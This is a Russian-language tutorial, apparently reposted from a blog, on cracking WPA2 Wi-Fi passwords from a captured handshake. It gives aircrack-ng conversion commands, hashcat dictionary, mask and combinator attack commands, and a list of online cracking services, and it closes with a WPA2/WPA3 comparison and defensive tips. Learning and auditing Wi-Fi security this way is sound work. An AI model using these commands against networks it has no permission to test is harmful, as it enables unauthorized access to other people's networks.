Как взломать Wi-Fi с помощью Kali Linux 2020.4 и Ubuntu 20.04. Часть 2

Как взломать Wi-Fi с помощью Kali Linux 2020.4 и Ubuntu 20.04. Часть 2

Life-Hack [Жизнь-Взлом]/Хакинг

#Обучение

Для начала, конвертируем файл hs.pcap в файл hs.hccapx (в команде новый файл пишется без расширения, только название): 

#в Kali:
sudo aircrack-ng -j /home/kali/hs /home/kali/hs.pcap

#в Ubuntu:
sudo aircrack-ng -j /home/USERNAME/hs /home/USERNAME/hs.pcap

Это нужно, чтобы программа по расшифровке хеша hashcat смогла прочесть файл. Она подбирает пароли с помощью ЦП и/или ГП.

Конвертация из .pcap в .hccapx утилитой hashcat

8. Подбор по словарю 

В Ubuntu установим hashcat командой: 

sudo apt install hashcat

Словарь – txt-файл с одним словом в каждой строке (рис. 16) Создадим или скачаем словарь (см. доп. материалы) и поместим его в /home/kali, либо /home/USERNAME для Ubuntu.

Пример словаря для атаки по словарю

Пароль от моей точки доступа: qwerty12. Он присутствует в словаре для подбора пароля. 

Чтобы начать перебор по словарю введем команду: 

#в Kali:
hashcat --force -m2500 -a0 /home/kali/hs.hccapx /home/kali/dic.txt

#в Ubuntu:
hashcat --force -m2500 -a0 /home/USERNAME/hs.hccapx /home/USERNAME/dic.txt 

Расшифруем значения опций: 

--force – скрыть ошибки. 

-m2500 – тип взламываемого хеша WPA-EAPOL-PBKDF2. 

-a0 – атака по словарю. Можно без этого флага, так как он работает по умолчанию. 

/home/kali/hs.hccapx – файл хеша. 

/home/kali/dic.txt – словарь. 

В случае успеха статус взлома примет значение Cracked и мы получим пароль (рис. 17).

Успешный взлом пароля атакой по словарю утилитой hashcat

9. Брутфорс и атака по маске 

При брутфорсе (англ. brute force) перебираются все возможные символы. Используя маски, мы сужаем диапазон подбираемых символов, например, только числа или только числа и строчные символы. Таким образом на перебор требуется меньше времени. Этот подход удобен, если мы примерно знаем, как человек придумывает пароли. Из атаки по маске можно сделать брутфорс, включив в перебор все символы. 

Для атаки по маске введем следующую команду: 

#в Kali:
hashcat -m2500 -a3 -1?l -2?d /home/kali/hs.hccapx ?1werty?2?2

#в Ubuntu:
hashcat -m2500 -a3 -1?l -2?d /home/USERNAME/hs.hccapx ?1werty?2?2 

Значения опций: 

-m2500 – тип взламываемого хеша, WPA-EAPOL-PBKDF2. 

-a3 – атака по маске. 

-1?l – маска по прописным латинскими буквам (прописная буква L). 

-2?d – маска по цифрам. 

hs.hccapx – файл хеша. 

?1werty?2?2 – предполагаемый пароль с неизвестными символами. В данном случае задача упрощена для экономии времени.

Успешный взлом пароля атакой по маске утилитой hashcat

Команда для расчета через видеокарту: 

hashcat -D2 -m2500 -a3 -1?l -2?d hs.hccapx ?1werty?2?2 

Здесь -D2 – устройство для расчета, ГП. 

Номер Устройство 1 ЦП 2 ГП 3 FPGA, DSP, Co-Processor 

10. Комбинаторная атака 

В комбинаторной атаке используются два словаря. Слова из двух словарей конкатенируются. Если словари содержат следующие слова:

Hello
World
5588
!

то после их соединения получим такой словарь: 

HelloHello
HelloWorld
Hello5588
Hello!
WorldHello
WorldWorld
World5588
World!
5588Hello
5588World
55885588
5588!
!Hello
!World
!5588
!!

Запустим комбинаторную атаку: 

#в Kali:
hashcat -m2500 -a1 /home/kali/hs.hccapx /home/kali/dic1.txt /home/kali/dic2.txt

#в Ubuntu:
hashcat -m2500 -a1 /home/USERNAME/hs.hccapx /home/USERNAME/dic1.txt /home/USERNAME/dic2.txt 

Здесь: 

/home/kali/dic1.txt – первый словарь. 

/home/kali/dic2.txt – второй словарь.

Успешный взлом пароля комбинаторной атакой утилитой hashcat

11. Куда сохраняется пароль 

После удачной расшифровки пароль выводится на экран и записывается в файл ~/.hashcat/hashcat.potfile

Откроем его в текстовом редакторе, чтобы посмотреть результат: 

sudo nano ~/.hashcat/hashcat.potfile

12. Онлайн-сервисы по расшифровке хеша 

Также хеш был отправлен в бесплатный онлайн-сервис по расшифровке хеша onlinehashcrack.com и через 12 часов 6 минут пришло письмо, что пароль получен (рис. 20). 

Результаты взлома пароля с помощью сервиса onlinehashcrack.com

Платформа passcrack.online получила пароль за 5 минут (рис. 21). С отправки в онлайн-сервисы лучше начинать расшифровку, так как вычислительных ресурсов у них больше, чем у домашнего компьютера.

Результаты взлома пароля с помощью сервиса passcrack.online

13. Разница между WPA2 и WPA3 

В июле 2018 года Wi-Fi Alliance выпустил протокол беспроводной безопасности WPA3. Посмотрим, чем он отличается от своего предшественника. 

Недостатки WPA2: 

  • уязвим к взлому через WPS;
  • возможен перехват рукопожатий и получение пароля с помощью брутфорса; 

Преимущества WPA3 в сравнении с WPA2: 

  • устранена уязвимость четырехстороннего рукопожатия за счет применения технологии SAE (Simultaneous Authentication of Equals), которая защищает от офлайн атак по словарю.
  • поддержка PMF (Protected Management Frames) для контроля целостности трафика;
  • шифрование 192 бит в режиме WPA3-Enterprise и 128 бит в WPA3-Personal;
  • упрощенная настройка IoT-устройств. 

Недостатки WPA3: 

  • уязвим к взлому через WPS. [2] 

Общее уязвимое место у WPA 2 и 3 – WPS (Wi-Fi Protected Setup)

14. Дополнительные материалы 

Файл .hccapx для практики 

На сайте hashecat доступен для скачивания файл .hccapx, на котором можно попрактиковаться в расшифровке. Зашифрованный пароль: hashcat!

Онлайн-конвертер .pcap в .hccapx 

Словари 

Онлайн-платформы для расшифровки хеша 

Бесплатные 

  • crypt-fud.ru – принимает файлы .cap и .hccapx;
  • passcrack.online – принимает только файлы .hccapx размером не более 5Кб. Ссылка на страницу загрузки файла для расшифровки придет в письме после регистрации;
  • onlinehashcrack.com – бесплатно, если пароль простой «12345678» или он есть в словаре из 20 млн слов. В ином случае используется брутфорс на ГП 9$/час.
  • wpa-sec.stanev.org – распределенная система;
  • kraken-client – распределенная система; 

Платные 

  • gpuhash.me – в случае успеха нужно заплатить 0.001BTC;
  • xsrc.ru – 100 руб. за пароль. 

Чем открыть большой текстовой файл 

Бесплатные программы для чтения и редактирования больших txt-файлов. 

Чтение 

Редактирование 

Полезные ссылки 

Законодательство 

  • Статья 274 УК РФ о преступлениях в сфере компьютерной информации. 

Саундтреки из сериала «Мистер Робот» 

  • Яндекс.Музыка – часть 1234567;
  • Spotify – часть 1234567 и все треки;
  • iTunes – часть 1234567;
  • YouTube – часть 1&234567.

Мы научились мониторить Wi-Fi сети, проводить деаутентификацию подключенных к точке доступа устройств, перехватывать рукопожатия, получать пароли методом подбора по словарю и брутфорсом. Также узнали разницу между WPA2 и WPA3, и определили их общее уязвимое место. 

Несколько рекомендаций, повышающих информационную безопасность: 

  • использовать сложный пароль и периодически менять его;
  • отключить функцию WPS в роутере;
  • регулярно обновлять прошивку роутера;
  • использовать VPN (виртуальная частная сеть): OpenVPN, WireGuard и прочие.

Источник


Report Page